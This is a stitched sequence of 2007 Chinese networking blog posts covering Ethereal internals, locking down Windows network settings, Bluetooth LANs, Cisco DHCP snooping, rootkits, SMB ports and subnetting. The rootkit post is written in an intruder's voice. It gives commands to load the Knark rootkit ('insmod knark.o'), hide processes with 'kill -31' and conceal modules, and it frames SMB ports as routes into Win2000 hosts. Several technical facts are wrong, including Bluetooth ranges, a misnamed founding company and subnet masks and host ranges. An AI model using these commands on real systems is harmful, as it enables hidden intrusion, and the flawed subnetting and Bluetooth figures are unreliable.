　　在Ethereal中有一个角本专门来发现开发者定义的类式proto_reg_handoff_xxx这样的注册函数名，然后自动生成调用这些注册函数的代码。这样开发者不需要知道自己的注册函数如何被调用的。这样一个新的协议分析模块就加入到系统中了。
　　由于采用了插件方式，Ethereal良好的结构设计让开发者只需要关系自己开发的协议模块，不需要关心整个系统结构，需要将模块整合进系统只需要写一个注册函数即可，连初始化时调用这个注册函数都由脚本自动完成了。正是因为有很好的体系结构，这个系统才能够开发出如此多的协议解析器

　　尽管Ethereal是目前最好的开放源码的网络分析系统，但Ethereal仍然有一些可以改进的地方，一个优秀的网络分析器，尽可能的正确分析出数据协议和高效的处理数据是两个重要的指标。在协议识别方面Ethereal大多采用端口识别，有少量协议采用内容识别。这就让一些非标准端口的协议数据没有正确解析出来。比如ftp协议如果不是21端口的话，Ethereal就无法识别出来，只能作为tcp数据处理。另外对于内容识别式。Ethereal是将所以内容识别的函数组成一张入口表。每次协议数据需要内容识别时，按字母顺序逐个调用表里的每个识别函数。比如对于识别yahoo massanger协议。主要是看数据前几个字节是不是’ymsg’.由于协议名为y开头。所以当识别出协议时已经把所有内容识别函数调用了一遍。这些都是由于Ethereal没有实现tcp协议栈，无法做到流级别的识别。导致在协议识别方面有点缺陷。

屏蔽网络设置小技巧　保障网络参数安全

noreply@blogger.com (Eric White) — Wed, 11 Jul 2007 10:48:00 +0000

管理和维护局域网是一件很烦人的事情，因为网络管理员肯定会经常面临这样的问题，那就是自己设置好的局域网参数，被其他人修改后，导致网络无法正常连接，遇到故障后，自己还必须对出现故障的计算机进行认真排除，

直到重新解决故障为止；很显然这种对网络设置权限完全放开的做法，不仅会加大工作人员的维护工作量，也大大降低了维护效率；为了提高局域网的维护效率，避免其他人随意对网络参数进行非法设置，我们应该采取措施禁止别人来设置网络参数，下面就是几种屏蔽网络设置的小技巧：

一、隐藏网上邻居

大家知道，用鼠标右键单击网上邻居图标，然后再从弹出的右键菜单中选择“属性”命令就可以打开网络参数设置对话框，对网络参数进行设置了。为此，我们可以通过隐藏“网上邻居”图标，让其他人无法打开网上邻居属性对话框，从而到达禁止设置网络参数的目的：　

1、首先打开开始菜单，并选择其中的运行命令，然后在弹出的运行对话框中，输入regedit命令，这样系统就会打开一个注册表编辑器操作窗口；　

2、在这个窗口中，大家可以用鼠标依次访问键值HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer；　

3、随后在对应Explorer键值右边的操作窗口中，大家可以用鼠标左键单击窗口的空白处，从弹出的快捷菜单中，依次访问“新建”/“DWORD串值”命令；　

4、在打开的DWORD串值设置框中，大家必须给新建的DWORD串值命名为NoNetHood，同时把该值设置为1（十六进制）；　

5、设置好所有参数后，重新启动计算机就可以使设置生效了。　

二、隐藏网络图标

要想打开网络参数设置对话框，除了通过网上邻居的属性命令能实现目的外，大家也可以利用控制面板中的“网络”图标，来访问网络参数设置对话框，为此我们必须禁止其他用户对“网络”图标的访问：　

1、在Windows系统的开始菜单中找到运行命令，并在随后弹出的运行对话框中输入“control.ini”；　

2、接着系统将会启动记事本程序，来打开系统文件control.ini，在该文件的[don't load]设置段处，我们输入“netcpl.cpl=no”这样的字符；　

3、输入完毕后，保存文件，并重新启动计算机就可以隐藏控制面板中的“网络”图标了。

三、禁用网上邻居属性

要是大家不想隐藏桌面上的网上邻居图标的话，也有办法禁止用户通过“网上邻居”图标来打开网络属性对话框，这个办法就是让“网上邻居”无效，下面就是具体的操作步骤：　

1、大家知道，由于对应“网上邻居”图标的文件是c:\windows\system下的netcpl.cpl，因此访问“网上邻居”其实就是访问该文件，要让“网上邻居”无效，只要移除netcpl.cpl或者给netcpl.cpl改名；　

2、大家只要把netcpl.cpl移动其他文件夹，或者把netcpl.cpl换名存储为其他文件名，这样当我们访问“网上邻居”时，系统在c:\windows\system下就找不到netcpl.cpl文件了，从而也就无法打开“网上邻居”属性对话框了。　

四、取消网络访问权限

仔细分析上面提到的几种方法，大家不难发现这些方法几乎都是通过隐藏的方式来实现目的的，不过要是用户一旦找到对应“网上邻居”或者“网络”图标的文件的话，同样可以打开网络属性对话框；因此要实现真正意义上的禁止，我们应该通过修改注册表，来取消用户访问网络属性的权利： 1、首先打开开始菜单并单击运行命令，然后在弹出的运行对话框中，输入注册表编辑命令regedit，来打开注册表编辑窗口； 2、接着用鼠标左键依次单击HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network键支； 3、在对应Network键值的右边窗口中，查看一下是否有“NoNetSetup”这样的Dword值，如果没有就新建一个，并把该Dword值设置为1； 4、单击确认按钮退出注册表编辑对话框，并重新启动计算机，当大家再次访问“网上邻居”或者“网络”图标时，系统就会警告用户无权访问网络，这样用户自然也就没有机会修改网络设置了

蓝牙技术在组建无线局域网中的应用

noreply@blogger.com (Eric White) — Tue, 10 Jul 2007 10:33:00 +0000

摘要

随着计算机、网络通信技术的发展，采用蓝牙技术组建无线局域网，不仅在办公条件不完善时能发挥作用，而且在临时增删办公点和移动性办公业务方面也有着独特的优势。文章对蓝牙技术作了介绍，对组网体系结构进行了说明，并对其发展前景进行了展望。

1、引言

在现代企业的办公局域网络中。个人电脑要登录单位内部的局域网以及因特网，访问网上资源，个人电脑之间要进行文件、资料和设备的共享。这样来PC机与各种外设之间，PC机与各种共享设备之间，以及PC机与局域网插口之间，就存在许许多多的连线，给移动办公及调度管理带来了极大的不便。蓝牙(Bluetooth)技术发展的初衷是为了用一种统一的无线通信技术来取代各种数字化设备之间相互连接的电缆。利用蓝牙技术组建企业内部通信网。构建因特网网络平台，不仅可以改善人们的办公环境，而且可以提高企业的现代化管理水平。加快现代企业的办公自动化进程。

蓝牙技术是由爱立信、诺基亚、因特网、IBM和东芝5家公司于1994年共同提出开发的。蓝牙技术的本质是设备间的无线联接，主要用于通信与信息设备。近年来，在电声行业中也开始使用。依据发射输出电平可以有3种距离等级，Classl为1OOm左右、Class2约为1OOm、Class3约为2-3m。一般情况下，其正常的工作范围是10m半径之内。在此范围内，可进行多台设备间的互联。但对于某些产品，设备间的联接距离甚至远隔100m也照样能建立蓝牙通信与信息传递。

蓝牙技术的特点包括：采用跳频技术，数据包短，抗信号衰减能力强；采用快速跳频和前向纠错方案以保证链路稳定，减少同频干扰和远距离传输时的随机噪声影响；使用2.4GHzISM频段，无须申请许可证；可同时支持数据、音频、视频信号；采用FM调制方式，降低设备的复杂性。

该技术的传输速率设计为1MHz，以时分方式进行全双工通信，其基带协议是电路交换和分组交换的组合。一个跳频频率发送一个同步分组，每个分组占用一个时隙，使用扩频技术也可扩展到5个时隙。同时，蓝牙技术支持1个异步数据通道或3个并发的同步话音通道，或1个同时传送异步数据和同步话音的通道。每一个话音通道支持64kb/s的同步话音；异步通道支持最大速率为721kb/s，反向应答速率为57.6kb/s的非对称连接，或者是432.6kb/s的对称连接。

目前，蓝牙技术已被普遍应用在笔记本电脑上，以帮助两台(或多台)笔记本电脑之间实现无线通信。全世界已有2161家公司参加了SIG(SpecialInterestGroup)组织，并正在共同制定蓝牙技术标准。SIG的核心公司除上述最初提出开发蓝牙技术的5家公司外，还有3com、Lucent、微软和摩托罗拉4家。SIG成员公司包括：PC个人电脑、移动电话、网络相关设备、外围辅助设备和A/V设备、通讯设备和汽车电子、自动售货机、医药器械、计时装置等诸多领域的设备制造公司。

2、蓝牙体系结构

蓝牙体系结构包括3部分：高端应用层、各种协议(软件)、射频模块和基带模块。下面就硬件、软件、路由机制3方面作简略说明。

2.1 硬件部分

(1)射频模块

将基带模块的数据包通过无线电信号以一定的功率和跳频频率发送出去，实现蓝牙设备的无线连接。

(2)基带模块

采用查询和寻呼方式，使跳频时钟及跳频频率同步，为数据分组提供对称连接(SCO)和非对称连接(ASL)，并完成数据包的定义、前向纠错、循环冗余校验、逻辑通道选择、信号噪化、鉴权、加密、编码和解码等功能。它采用混合电路交换和分组交换方式，既适合语音传送，也适合一般的数据传送。每一个语音通道支持64kb/s同步语音，异步通道支持最大速率723.2kb/s(反向57.6kb/s)的非对称连接或433.9kb/s的对称连接。

2.2 蓝牙协议(软件)

(1)链路管理协议(LMP)

通过对链接的发送、交换、实施身份鉴权和加密，并通过协商确定基带数据分组的大小，控制射频部分的电源模式、工作周期及网络内蓝牙设备的连接状态。

(2)逻辑链路控制与应用协议(L2CAP)

L2CAP与LMP平行工作，共同实现OSI的数据链路层的功能。它可提供对称连接和非对称连接的数据服务。

(3)串行电缆仿真协议(RFCOMM)

在蓝牙的基带上仿真RS-232的功能，实现设备串行通信。例如，在拨号网络中，主机将AT命令发送到调制解调器，再传送到局域网，建立连接后，应用程序就可以通过RFCOMM提供的串口发送和接收数据。

(4)服务发现协议(SDP)

按照用户需要，发现相应服务及有关设备，并给出服务与设备列表。工作过程如下：主设备广播1条信息，从设备做出相应的反应，将收集到的地址存于主设备的内存中，然后主设备从中选择1个地址，利用链路管理代理所提供的进程在物理层建立连接。一旦建立了服务发现协议，在主从设备之间的物理层连接上就建立了一条LZCAP点对点通信层。

2.3 无线办公网络的路由机制

利用蓝牙技术构建现代企业无线办公网络，实现的基本功能包括：文件、档案、报表、设备资源的共享和互连，比如PC机之间的互连，PC机与各种外设或智能设备的互联和共享等；利用蓝牙设备无线访问单位内部局域网以及因特网；通过一定的路由机制实现办公网络内部的各个匹克网(Piconet)之间的互连。

根据企业的实际需要，企业无线网络由多个匹克网构成，而不同匹克网之间的通信应该只在办公网络内部进行路由，而不应通过局域网，这就需要建立一种特殊的路由机制，使得各匹克网之间的通信能够进行正确的路由，达到方便快捷的通信、拓宽通信范围、减轻网络负载的目的。

(1)蓝牙网关

用于办公网络内部的蓝牙移动终端通过无线方式访问局域网以及因特网；跟踪、定位办公网络内的所有蓝牙设备，在两个属于不同匹克网的蓝牙设备之间建立路由连接，并在设备之间交换路由信息。

主要功能包括

* 实现蓝牙协议与TCP/IP协议的转换，完成办公网络内部蓝牙移动终端的无线上网功能。

* 在安全的基础上实现蓝牙地址与IP地址之间的地址解析，它利用自身的IP地址和TCP端口来唯一地标识办公网络内部没有IP地址的蓝牙移动终端，比如蓝牙打印机等。

* 通过路由表来对网络内部的蓝牙移动终端进行跟踪、定位，使得办公网络内部的蓝牙移动终端可以通过正确的路由，访问局域网或者另一个匹克网中的蓝牙移动终端。

* 在两个属于不同匹克网的蓝牙移动终端之间交换路由信息，从而完成蓝牙移动终端通信的漫游与切换。在这种通信方式中，蓝牙网关在数据包路由过程中充当中继作用，相当于蓝牙网桥。

(2)蓝牙移动终端(MT)

蓝牙移动终端是普通的蓝牙设备，能够与蓝牙网关以及其他蓝牙设备进行通信，从而实现办公网络内部移动终端的无线上网以及网络内部文件、资源的共享。

如果目的端位于单位内部的局域网或者因特网，则需要通过蓝牙网关进行蓝牙协议与TCP/IP协议的转换，如果该MT没有IP地址，则由蓝牙网关来提供，其通信方式为MT-BG-MT。如果目的端位于办公网络内部的另一个匹克网，则通过蓝牙网关来建立路由连接，从而完成整个通信过程的漫游其通信方式为MT-BG-M_MT(为主移动终端)-MT。采用蓝牙技术也可使办公室的每个数据终端互相连通。例如多台终端共用1台打印机，可按照一定的算法登陆打印机的等待队列，依次执行。

3、蓝牙技术的发展前景

蓝牙技术是一种新兴的技术，尚未投入广泛应用，目前许多蓝牙设备还处于实验室试验阶段，还有待于实际使用的严格检验。2002年下半年起，蓝牙产品的生产量明显增加，市场进一步扩大。

蓝牙的发展轨迹符合当今新技术发展的理想模式即竞争前合作。据ABI(AlliedBusinessIntelligence)的一项调查显示，尽管最近蓝牙市场有点迟滞，但其发展没有减缓的趋势。ABI的官员说，越来越多的人考虑给自己的设备增加无线连接，他们也逐步意识到蓝牙技术的低功耗和低成本解决方案是理想的。蓝牙的使用范围已不仅仅局限于笔记本电脑和蜂窝电话，蓝牙收发器(即蓝牙卡)已经越来越多地嵌入到从PC机到工业设备的各种设备中，蓝牙不仅仅是电缆替代品。不过，ABI同时提醒到，在蓝牙成功的道路还存在着一定的障碍，其主要表现在以下几个方面：

* 因硅半导体价格的昂贵，蓝牙芯片过于昂贵以至于一时难以普及；

* 蓝牙协议的实现与标准不一致，使硬件的互操作性、软件的互操作性以及软硬件之间的互操作性不佳；

* 软件开发还难以为蓝牙应用提供完整的解决方案，跨平台移植难以实现。

尽管这些问题正在减缓蓝牙设备投放市场的速度，但随着SIG新标准的制定，预计这种统一数据传送方式会被广泛应用，到那时，全球将有数以亿计的计算机和通信设备使用蓝牙技术，它将带来一个无线通信的新时代

解决IP地址冲突的方法--DHCP SNOOPING

noreply@blogger.com (Eric White) — Mon, 09 Jul 2007 08:03:00 +0000

使用的方法是采用DHCP方式为用户分配IP，然后限定这些用户只能使用动态IP的方式，如果改成静态IP的方式则不能连接上网络；也就是使用了DHCP SNOOPING功能。
例子：
version 12.1
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
service compress-config
!
hostname C4-2_4506
!
enable password xxxxxxx!
clock timezone GMT 8
ip subnet-zero

no ip do main-lookup
!
ip dhcp snooping vlan 180-181 // 对哪些VLAN 进行限制
ip dhcp snooping
ip arp inspection vlan 180-181
ip arp inspection validate src-mac dst-mac ip

errdisable recovery cause udld
errdisable recovery cause bpduguard
errdisable recovery cause security-violation
errdisable recovery cause channel-misconfig
errdisable recovery cause pagp-flap
errdisable recovery cause dtp-flap
errdisable recovery cause link-flap
errdisable recovery cause l2ptguard
errdisable recovery cause psecure-violation
errdisable recovery cause gbic-invalid
errdisable recovery cause dhcp-rate-limit
errdisable recovery cause unicast-flood
errdisable recovery cause vmps
errdisable recovery cause arp-inspection
errdisable recovery interval 30
spanning-tree extend system-id
!
!

interface GigabitEthernet2/1 // 对该端口接入的用户进行限制，可以下联交换机
ip arp inspection limit rate 100
arp timeout 2
ip dhcp snooping limit rate 100
!

interface GigabitEthernet2/2
ip arp inspection limit rate 100
arp timeout 2
ip dhcp snooping limit rate 100
!
interface GigabitEthernet2/3
ip arp inspection limit rate 100
arp timeout 2
ip dhcp snooping limit rate 100
!
interface GigabitEthernet2/4
ip arp inspection limit rate 100
arp timeout 2
ip dhcp snooping limit rate 100

屏蔽网络设置小技巧　保障网络参数安全

noreply@blogger.com (Eric White) — Sun, 08 Jul 2007 00:18:00 +0000

权限保卫战——可怕的Rootkit

noreply@blogger.com (Eric White) — Sat, 07 Jul 2007 03:45:00 +0000

在我们获得了对目标的控制权后，还想保持这种控制权限，于是就出现了木马后门，Rootkit之类的保护权限的手段。首先来说一下我们常见的应用层次的木马后门，比如我们常见的远程控制类的软件，像国外的Sub7,VNC,netbus,国内的冰河，灰鸽子，黑洞等等，这些大家都很熟悉因此就不详细介绍了。然而此类后门的可以很容易被发现，现在的杀毒软件大多都能轻松的查处，即使暂时查不到，用其他手段检测也不是很困难,现在就我就给大家介绍一种比一般木马后门潜伏的更深的一类木马后门--Rootkit。
传统的Rootkit是一种比普通木马后门更为阴险的木马后门。它主要通过替换系统文件来达到目的。这样就会更加的隐蔽，使检测变得比较困难。传统的Rootkit对一系列平台均有效，但主要是针对Unix的，比如Linux,AIX,SunOs等操作系统。当然有些Rootkits可以通过替换DLL文件或更改系统来攻击windows平台.Rootkit并不能让你直接获得权限，相反它是在你通过各种方法获得权限后才能使用的一种保护权限的措施，在我们获取系统根权限（根权限即root权限，是Unix系统的最高权限)以后,Rootkits提供了一套工具用来建立后门和隐藏行迹，从而让攻击者保住权限。
下面就针对Unix来讲解一下传统Rootkit的攻击原理
RootKits是如何实现后门的呢?为了理解Rootkits后门，有必要先了解一下Unix的基本工作流程，当我们访问Unix时（不管是本地还是远程登陆），/bin/login程序都会运行，系统将通过/bin/login来收集并核对用户的帐号和密码.Rootkits使用一个带有根权限后门密码的/bin/login来替换系统的/bin/login,这样攻击者输入根权限后门的密码，就能进入系统。就算管理员更改了原来的系统密码或者把密码清空。我们仍能够
使用后门密码以根用户身份登陆。在攻入Unix系统后，入侵者通常会进行一系列的攻击动作，如安装嗅探器收集重要数据，而Unix中也会有些系统文件会监视这些动作，比如ifconfig等，Rootkit当然不会束手就擒，它会同样替换一下这些系统文件，
通常被Rootkit替换的系统程序有login,ifconfig,du,find,ls,netstart,ps等。由于篇幅问题，这些系统文件的功能就不一一罗列，有兴趣的读者可以自己去查找，现在Rootkit的工具很多，里面基本都是包含一些处理过的系统文件来代替原来的系统文件的，像tOmkit等一些Rootkit就是比较优秀的了。
防御办法：Rootkit如此可怕，得好好防它才行，实际上，防御他的最有效的方法时定期的对重要系统文件的完整性进行核查，这类的工具很多，像Tripwire就是一个非常不错的文件完整性检查工具。一但发现遭受到Rootkit攻击，那你就比较麻烦了，你必须完全重装所有的系统文件部件和程序，以确保安全性.

写到这里，战争似乎结束了，然而更可怕的Rootkit还没登场，那就是更加恐怖( 这个词一点也不夸张）的内核级Rootkit。在大多数操作系统中（各种Uni x和windows)，内核是操作系统最基本的部件，它控制着对网络设备、进程、系统内存、磁盘等的访问。例如当你打开一个文件时，打开文件的请求被发送到内核，内核负责从磁盘得到文件的比特位并运行你的文件浏览程序。内核级Rootkit使攻击者获得对系统底层的完全控制权。攻击者可以修改你的内核，大多数内核级Rootkit都能进行执行重定向，即截获运行某一程序的命令，将其重定向到入侵者所选中的程序并运行此程序。也就是说用户或管理员要运行程序A，被修改过的内核假装执行A,实际却执行了程序B.
现在就介绍一下内核级的Rootkit是如何攻击Unix系统的。
和传统的Rootkit不同，Unix的bin/login并未被修改，但所有执行/bin/login 的请求（当登陆系统时将产生）都被重定向到攻击者制作的隐藏文件/bin/backdoorlogin，这样当系统管理员使用检测传统级别的Rootkit的方法（比如用tripwire之类的软件检测文件的完整性）就行不通了,因为/bin/login并没有被改变。同样的道理，攻击者对其他的系统程序也进行重定，这样你的操作实际就是按照入侵者的意愿执行了。也就是说，表面上你在运行程序A,你也认为自己运行的是程序A,而实际上你运行的是入侵者设定的程序B~!
更恐怖的是,内核级Rootkit不仅仅只会进行执行重定向，许多内核级Rootkit还支持文件隐蔽。传统的Rootkit是通过替换ls程序来实现文件的隐藏，而内核级的Rootkit则是通过对内核的修改来对ls程序欺骗,更加的阴险隐蔽。另外内核级的Rootkit还能对进程和网络进行隐藏，用户将得不到真实的系统情况报告。
实现思路：根据系统的类型，攻击者有不同的方法来对内核进行修改，在N种Unix系统上修改内核最简单的方法就是利用系统本身的加载的内核模块(LKM)的功能，因此大多数的内核级Rootkit通过利用LKM动态地将内核更新来提供新功能，新添加的模块扩展了内核，同时对内核和其他使用内核的所有东西有了完全访问权。
因此，许多内核级Rootkit都通过LKM来实现。安装通过LKM实现的内核级Rootkit十分简单。例如，在Linux上安装Knark内核级Rootkit只需具有根权限的入侵者输入命令： insmod knark.o 就行了，模块被安装后就等着我们输入命令了。更妙的是整个过程不需要重启.。通过LKM 实现的Rootkit在Unix上十分流行。我们也常常会通过给windows平台打LKM补丁的方法攻击windows.
内核级Rootkit 的几个例子
现在有大量的内核级Rootkit可用，现在我就选几种比较强大的来跟大家讨论一下，
一、 linux 上的内核级Rootkit：Knark
Knark具有各种标准的内核级Rootkit功能，包括执行重定向，文件隐藏，进程隐藏和网络隐藏。另外，还有不少比较过瘾的功能，如：
1、远程执行：我们可以通过网络向运行Knark的机器发送一条命令，源地址是假造的，
命令被发往UDP端口53,使之表面上看起来像是DNS流量。我们就可以利用这个功能
来升级Knark，删除系统文件或其他任何我们想做的事
2、任务攻击：当某一进程在系统上运行时，它总是具有与UID和有效的UID(EUID)相关的权限。另外进程还具有与文件系统UID(FSUID)相关的文件及目录访问权。Knark的任务攻击能力可实时地将进程UID,EUID和FSUID改变。进程在不停止运动的情况下突然具有了新的权限
3、隐藏混杂模式：
同一般的RootKit一样，入侵者也会在受害者机器上运行嗅探器。我们可以用文件隐藏和进程隐藏将嗅探器隐藏起来。然而，以太网卡会被设成混杂模式，管理员可以检查到这一点
Knark将内核进行了修改，使之隐瞒网卡的混合模式，这将使嗅探变得更加隐秘。
4、实时进程隐藏：
Knark可以将一个正在运行的进程隐藏起来。通过发送信号31给一个进程，此进程将消失，
但仍在运行。命令kill-31 process_id将阻止内核汇报任何有关此进程的信息。进程在运行时，ps和lsof命令的使用都不能显示此进程
5、内核模块隐藏：Linux中的lsmod命令可以列出当前在机器上安装的LKM.,我们自然不想让管理员看到Knark模块，因此Knark包含了一个单独的模块modhide,modhide将Knark
和自己隐藏了起来。这样，当我们用Knark攻击一个系统时，我们首先为Knark.o做一个insmod,然后为modhide.o做一个insmod。这样不管谁运行lsmod命令，这些模块都不会被发现
二、另一个Linux上的内核级Rootkit：Adore
同Knark一样，Adore也是一个针对Linux的LKM RootKit. 他包含了标准的内核级Rootkit功能，如文件隐藏，进程隐藏，网络隐藏和内核模块隐藏。我们只所以讨论Adore，是因为他还有一个非常强大的功能：内置的根权限后门。
Adore的根权限后门可以让我们连接到系统上并获得根权限的命令外壳，此功能十分直接了当，Adore将此功能巧妙的包含在内核模块中了。这一招十分难破，因为管理员看不到任何文件、进程、侦听网络端口的迹象。

防御办法：防御内核级的Rootkit的根本办法是不要让攻击者得到你的机器的系统的根本权限（Unix里的root和windows里的admin),不过这看起来像废话：），目前对内核级的Rootkit还没有绝对的防御体系。
现在也存在一些Rootkit自动检测工具，但都不是很可靠.同时内核级的Rootkit也在不断的发展中，对一些系统来说防御它最好的办法是使用不支持LKM的内核，Linux的内核就可以设成不支持LKM的单一内核。

139/445端口与入侵win 2000主机

noreply@blogger.com (Eric White) — Fri, 06 Jul 2007 02:53:00 +0000

SMB(Server Message Block)，Windows协议族，用于文件和打印共享服务。在Win9X/NT中SMB基于NBT实现，NBT(NetBIOS over TCP/IP)使用137, 138 (UDP) and 139 (TCP）来实现基于TCP/IP的NETBIOS网际互联；而在Win2K以后，SMB除了基于NBT的实现，还可以直接运行在TCP/IP上，而没有额外的NBT层，使用TCP445端口。

　　当Win9X/NT（允许NBT)作为client来连接SMB服务器时，由于设计时并没有考虑到445端口因此只会连接服务器的139端口；而当Win2K/XP（允许NBT)作为client来连接SMB服务器时，它会同时尝试连接139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，以455端口通讯来继续.当445端口无响应时，才使用139端口。

　　假如我们的扫描结果显示对方打开了TCP139或445，这无疑方便了我们今后对它的文件传输和管理，使用NET命令对服务器进行远程管理操作，还有像NTCMD、Enum、Letmein、SMBCrack之类的工具都要基于这些端口来完成任务。但是要想成功利用这些端口，本地作为client还要满足一定的要求。

　　如果对方只有139，要想利用它，本机必须“网络连接/属性/TCPIP协议/属性/高级/WINS”中设置启用NBT(NetBIOS over TCP/IP)，将你的本地防火墙设置为允许这3个端口的通信，否则将无法与对方建立连接。使用普通拨号上网的用户就需要在拨号连接的网络属性里面通过选中“Microsoft 网络客户端”和“Microsoft 网络的文件和打印机共享”这两个组件来启用NBT，否则如果本地为Win9X/WinNT则直接显示无法连接，如果本地为Win2K/XP则直接尝试连接对方的445而跳过连接NBT，结果连接失败。

　　如果对方只有445，本机要是Win2K以后的系统就可以直接连接，但如果本机是Win9X/WinNT，由于Win9X/WinNT所实现的SMB只能基于NBT，因而此时本机只会尝试139而不能和445建立连接，此时本机就无法使用基于SMB的工具。所以说入侵NT/2000最好还是使用Win2K。

　　要是2个端口都开了，那就最好了，只要满足其中任一个连接要求就可以。

　　禁止139/445端口

　　1.通过对开始->设置->控制面版->管理工具 -> 本地安全策略 ->（鼠标右击）ip安全策略，在本地机器。点击"管理ip筛选器表和筛选器操作"，

　　2.在"管理ip筛选器列表"选项卡上点击"添加"。

　　3.弹出"ip筛选器列表"窗口。

　　4.分别添入名称和描述，如禁用139连接。并点击"添加"，接着会出现一个ip"筛选器向导"，单击下一步。

　　5.到"指定ip源地址"窗口，在"源地址"中选择"任何ip地址"，点击下一步。

　　6.在"ip通信目标"的"目标地址"选择"我的ip地址"，点击下一步。

　　7.在"ip协议类型"的"选择协议类型"选择"tcp"，点击下一步。

　　8.在"筛选器向导"的"设置ip协议端口"里第一栏为"从任意端口"，第二栏为"到此端口"并添上"139"，点击下一步。

　　9.接着点击"完成" ->然后再单击"关闭" 回到"管理ip筛选器表和筛选器操作"窗口。

　　10.选择"管理筛选器操作"选项卡点击"添加"。

　　11.同样会出现一个"筛先器操作向导"的窗口，点击"下一步"，在"名称"里添上"禁用139连接"。

　　12.按"下一步"，并选择"阻止"，再按"下一步"。

　　13.点击"完成"和"关闭"。

快速子网划分方法

noreply@blogger.com (Eric White) — Thu, 05 Jul 2007 04:30:00 +0000

子网划分基础:
子网划分(subnetting)的优点:
1.减少网络流量
2.提高网络性能
3.简化管理
4.易于扩大地理范围

怎么样创建一个子网:

如何划分子网?首先要熟记2 的幂:2 的0 次方到9 次方的值分别为:1,2,4,8,16,32,64,128,256和512。还有要明白的是:子网划分是借助于取走主机位,把这个取走的部分作为子网位。因此这个意味划分越多的子网,主机将越少。

子网掩码（Subnet Masks）:

子网掩码用于辨别IP 地址中哪部分为网络地址,哪部分为主机地址,有1 和0 组成,长32 位,全为1 的位代表网络号.不是所有的网络都需要子网,因此就引入1 个概念:默认子网掩码(default subnet mask).A 类IP 地址的默认子网掩码为255.0.0.0;B 类的为255.255.0.0;C 类的为255.255.255.0。

Classless Inter-Domain Routing(CIDR)：

CIDR 叫做无类域间路由,ISP 常用这样的方法给客户分配地址,ISP 提供给客户1 个块(block size),类似这样:192.168.10.32/28,这排数字告诉你你的子网掩码是多少,/28 代表多少位为1,最大/32.但是你必须知道的一点是:不管是A类还是B类还是其他类地址,最大可用的只能为/30,即保留2 位给主机位。

CIDR 值:
1.掩码255.0.0.0:/8(A 类地址默认掩码)
2.掩码255.255.0.0:/16(B 类地址默认掩码)
3.掩码255.255.255.0:/24(C 类地址默认掩码)

划分A类B类C类地址子网：

划分子网的几个捷径:
1.你所选择的子网掩码将会产生多少个子网?:2 的x 次方-2(x 代表子网位,即2 进制为1 的部分) PS：这里的x是指除去默认掩码后的子网位，例如网络地址192.168.1.1，掩码255.255.255.192，因为是C类地址，掩码为255.255.255.0。那么255.255.255.192（x.x.x.11000000）使用了两个1来作为子网位。

2.每个子网能有多少主机?: 2 的y 次方-2(y 代表主机位,即2 进制为0 的部分)

3.有效子网是?:有效子网号=256-10 进制的子网掩码(结果叫做block size 或base number)

4.每个子网的广播地址是?:广播地址=下个子网号-1

5.每个子网的有效主机分别是?:忽略子网内全为0 和全为1 的地址剩下的就是有效主机地址.
最后有效1 个主机地址=下个子网号-2(即广播地址-1)

根据上述捷径划分子网的具体实例:

C 类地址例子1:网络地址192.168.10.0;子网掩码255.255.255.192(/26)
1.子网数=2*2-2=2
2.主机数=2 的6 次方-2=62
3. 有效子网?:block size=256-192=64; 所以第一个子网为192.168.10.64, 第二个为192.168.10.128
4.广播地址:下个子网-1.所以2 个子网的广播地址分别是192.168.10.127 和192.168.10.191
5.有效主机范围是:第一个子网的主机地址是192.168.10.65 到192.168.10.126;第二个是192.168.10.129 到192.168.10.190

C 类地址例子2:网络地址192.168.10.0;子网掩码255.255.255.128(/26)
我知道我举的这个例子只有一个子网位，这通常是不合法的（由RFC文档所规定）。但是！世事无绝对，不是吗？这个子网掩码能在你需要两个子网每个子网126台主机时给你帮助，不过这是在特殊情况下实现的。在思科路由器的全局配置模式下输入ip subnet -zero命令来告诉你的路由器打破规则并使用一个1位的子网掩码（这个命令通常在运行CISCO IOS 12.x的所有路由器上默认存在）
1.子网数=2
2.主机数=2 的7 次方-2=126
3. 有效子网?:block size=256-128=128; 所以第一个子网为192.168.10.0, 第二个为192.168.10.128
4.广播地址:下个子网-1.所以2 个子网的广播地址分别是192.168.10.127 和192.168.10.255
5.有效主机范围是:第一个子网的主机地址是192.168.10.1 到192.168.10.126;第二个是192.168.10.129 到192.168.10.254

B 类地址例子1：网络地址:172.16.0.0;子网掩码255.255.255.128(/25)
注意！这个不是C类地址的子网掩码，然而这个子网划分是有一定难度的，但是！这个掩码却是十分有用的因为它创建了510个子网每个子网有126个主机，一个很好的组合。
1.子网数=2的9次方-2=510
2.主机数=2的7次方-2=126
3.有效子网?:block size=256-255=1，2，3，......这是第三个八位元组的数值，但是你不能忘记还有一位子网位在第四个八位元组。所以第四个八位元组分为两个子网。例如第三个八位元组表示子网3，那第四个八位元组的两个子网为172.16.3.0和172.16.3.128
4.广播地址:下个子网-1.所以第一个子网和最后1 个子网的广播地址分别是
172.16.0.255和
172.16.255.127
5.有效主机范围是:第一个子网的主机地址是172.16.0.129 到172.16.0.254;最后1 个是172.16.255.0 到172.16.255.126
（补充一下：可能有人问第一个子网为什么不是172.16.0.0---172.16.0.128呢？不要忘记！子网位和主机位不能为全0或者全1，172.16.0.0代表了整个172.16.x.x网络，同理，最后一个子网也就不可能是172.16.255.128---172.16.255.255了。）

B 类地址例子2:网络地址:172.16.0.0;子网掩码255.255.192.0(/18)
1.子网数=2*2-2=2
2.主机数=2 的14 次方-2=16382
3.有效子网?:block size=256-192=64;所以第一个子网为172.16.64.0,最后1 个为172.16.128.0
4.广播地址:下个子网-1.所以2 个子网的广播地址分别是172.16.127.255 和172.16.191.255
5.有效主机范围是:第一个子网的主机地址是172.16.64.1 到172.16.127.254;第二个是172.16.128.1 到172.16.191.254

B 类地址例子3:网络地址:172.16.0.0;子网掩码255.255.255.224(/27)
1.子网数=2 的11 次方-2=2046(因为B 类地址默认掩码是255.255.0.0,所以网络位为8+3=11)
2.主机数=2 的5 次方-2=30
3. 有效子网?:block size=256-224=32; 所以第一个子网为172.16.0.32, 最后1 个为172.16.255.192
4.广播地址:下个子网-1.所以第一个子网和最后1 个子网的广播地址分别是172.16.0.63 和
172.16.255.223
5.有效主机范围是:第一个子网的主机地址是172.16.0.33 到172.16.0.62;最后1 个是172.16.255.193 到172.16.255.223

A类地址子网划分跟B类和C类并没有什么区别，只是掩码位由16位和8位变成了24位而已。

简单地举个例子吧：
